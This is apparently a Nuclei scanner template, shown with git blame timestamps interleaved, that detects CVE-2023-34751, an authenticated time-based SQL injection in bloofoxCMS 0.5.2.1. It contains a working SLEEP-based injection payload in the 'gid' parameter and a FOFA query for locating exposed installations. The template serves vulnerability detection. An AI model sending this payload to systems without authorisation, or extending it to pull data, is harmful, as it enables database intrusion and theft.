2023-10-17 07:20:28 +00:00
|
|
|
id: CVE-2023-34751
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: bloofoxCMS v0.5.2.1 - SQL Injection
|
|
|
|
author: theamanrawat
|
|
|
|
severity: critical
|
|
|
|
description: |
|
|
|
|
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the gid parameter at admin/index.php?mode=user&page=groups&action=edit.
|
|
|
|
reference:
|
|
|
|
- https://www.bloofox.com
|
|
|
|
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-34751
|
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.8
|
|
|
|
cve-id: CVE-2023-34751
|
|
|
|
cwe-id: CWE-89
|
2023-10-18 16:26:30 +00:00
|
|
|
epss-score: 0.01254
|
2023-12-12 11:07:52 +00:00
|
|
|
epss-percentile: 0.83985
|
2023-10-17 17:52:26 +00:00
|
|
|
cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:*
|
2023-10-17 07:20:28 +00:00
|
|
|
metadata:
|
|
|
|
verified: "true"
|
|
|
|
max-request: 2
|
2023-10-17 17:52:26 +00:00
|
|
|
vendor: bloofox
|
|
|
|
product: bloofoxcms
|
|
|
|
fofa-query: "Powered by bloofoxCMS"
|
2023-10-17 07:20:28 +00:00
|
|
|
tags: cve,cve2023,sqli,bloofox,authenticated
|
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /admin/index.php HTTP/2
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
username={{username}}&password={{password}}&action=login
|
|
|
|
- |
|
|
|
|
@timeout: 10s
|
|
|
|
POST /admin/index.php?mode=user&page=groups&action=edit HTTP/2
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
name=User&backend=0&content=0&settings=0&permissions=0&tools=0&demo=0&gid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&name_old=User&send=Save
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- duration>=6
|
|
|
|
- contains(header_2, "text/html")
|
|
|
|
- contains(body_2, 'bloofoxCMS Admincenter')
|
|
|
|
condition: and
|
2023-12-12 12:02:03 +00:00
|
|
|
# digest: 4a0a00473045022100fdc336209cbfcd23073d5db418663696e8929d48bef4891f3964ce0e40137c41022009b8bfea5af1fa5e4214987f986d60533b6bc6c76a5bc667e7edb61081902d80:922c64590222798bb761d5b6d8e72950
|